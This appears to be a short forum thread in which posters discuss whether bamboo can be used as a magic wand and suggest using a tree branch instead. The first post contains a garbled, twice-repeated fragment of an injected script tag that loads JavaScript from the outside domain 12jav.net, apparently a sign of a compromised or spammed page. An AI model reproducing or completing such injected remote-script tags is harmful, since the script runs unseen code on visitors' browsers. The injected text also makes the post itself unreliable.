Strictly speaking, anything can be used as a wand.Just remember that bamboo is grass! It is hollow. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Traditionally, wands are made from wood. And as Brysing said, bamboo isn't really wood. Start from there, use a tree branch from your backyard (make sure you give an offering to the tree, such as water, before you take something that isn't yours!) and make it into however you want it to be.

I think can make wand, many use Bamboo as staff. :)
